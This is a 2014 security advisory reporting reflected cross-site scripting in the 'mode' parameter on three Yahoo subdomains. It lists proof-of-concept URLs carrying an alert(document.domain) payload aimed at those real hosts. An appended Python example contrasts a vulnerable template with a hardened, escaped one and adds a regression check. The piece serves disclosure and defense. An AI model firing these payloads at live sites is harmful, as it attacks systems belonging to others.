In Jan '14 I reported three Cross-site Scripting vulnerabilities to the Yahoo Bug Bounty Program. And I know, it is really really hard, but ... again ... no feedback or bounty :)

Advisory: Yahoo Bug Bounty Program Vulnerability #4 #5 #6 Cross-site Scripting vulnerabilities
Advisory ID: SSCHADV2014-YahooBB-004 / YahooBB-005 / YahooBB-006
Author: Stefan Schurtz
Affected Software: Successfully tested on celebrity.yahoo.com, movies.yahoo.com, music.yahoo.com
Vendor URL: http://yahoo.com/
Vendor Status: Not tested anymore
Bounty: nothing

==========================
Vulnerability Description
==========================

The 'mode' parameter on "https://celebrity.yahoo.com/", "https://movies.yahoo.com/" and "https://music.yahoo.com/" is prone to a Cross-site Scripting vulnerability.

==========================
PoC-Exploit
==========================

http://celebrity.yahoo.com/video/george-clooney-responds-tina-fey-230813957.html?m_id=&m_mode=&instance_id=&mode=multipart"-alert(document.domain)-"&__phase=pre&type=index

http://movies.yahoo.com/photos/star-wars-cast-rumors-1389647299-slideshow/?m_id=&m_mode=&instance_id=&mode=multipart"-alert(document.domain)-"&__phase=pre&type=index

http://music.yahoo.com/videos/?m_id=&m_mode=&instance_id=&mode=multipart"-alert(document.domain)-"&__phase=pre&type=index

==========================
Disclosure Timeline
==========================

20-Jan-2014 - vendor informed by contact form (Yahoo Bug Bounty Program)

==========================
Credits
==========================

Vulnerabilities found and advisory written by Stefan Schurtz.
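The payload in the PoC URLs (`multipart"-alert(document.domain)-"`) only works because the parameter is reflected into a JavaScript string literal that is protected by nothing more than its surrounding double quotes. The following Python illustration is added here and is not Yahoo's code or part of the original advisory: a constructed template that reflects 'mode' the vulnerable way, its hardened counterpart, and a check that the reflected value stays inside the literal. The host in POC_URL is a placeholder; only the query string is taken from the PoC.

```python
import json
import re
from urllib.parse import parse_qs, urlsplit

# Constructed URL: placeholder host, query string copied from the advisory's PoC.
POC_URL = ('https://example.invalid/video/page.html'
           '?m_id=&m_mode=&instance_id=&mode=multipart"-alert(document.domain)-"'
           '&__phase=pre&type=index')


def extract_mode(url: str) -> str:
    """Return the raw 'mode' query parameter as the server would receive it."""
    return parse_qs(urlsplit(url).query)["mode"][0]


def render_vulnerable(mode: str) -> str:
    """Constructed stand-in for the bug: the value is merely wrapped in quotes,
    so a double quote in the value terminates the literal and the rest of the
    value (here: -alert(document.domain)-) is parsed as JavaScript code."""
    return '<script>var mode = "' + mode + '";</script>'


def render_hardened(mode: str) -> str:
    """json.dumps() escapes quotes, backslashes and control characters, so the
    value can never end the literal; '</' is split as well so the value cannot
    close the enclosing <script> element (a separate, well-known breakout)."""
    literal = json.dumps(mode).replace("</", "<\\/")
    return "<script>var mode = " + literal + ";</script>"


# One well-formed JS string literal assigned to 'mode', escapes allowed inside.
_LITERAL = re.compile(r'var mode = "((?:[^"\\]|\\.)*)";')


def value_stays_inside_literal(rendered: str, original: str) -> bool:
    """True only if the page holds exactly one well-formed literal for 'mode'
    and that literal decodes back to the original value, i.e. no part of the
    parameter escaped into code. Usable as a unit test for a template fix."""
    match = _LITERAL.search(rendered)
    if match is None:
        return False
    try:
        return json.loads('"' + match.group(1) + '"') == original
    except ValueError:
        return False
```

For benign input both templates pass the check; for the PoC value only the hardened template does, which is exactly the regression a fix for this class of bug should assert.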
==========================
References
==========================

http://yahoo.com/
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-004.txt
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-005.txt
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-006.txt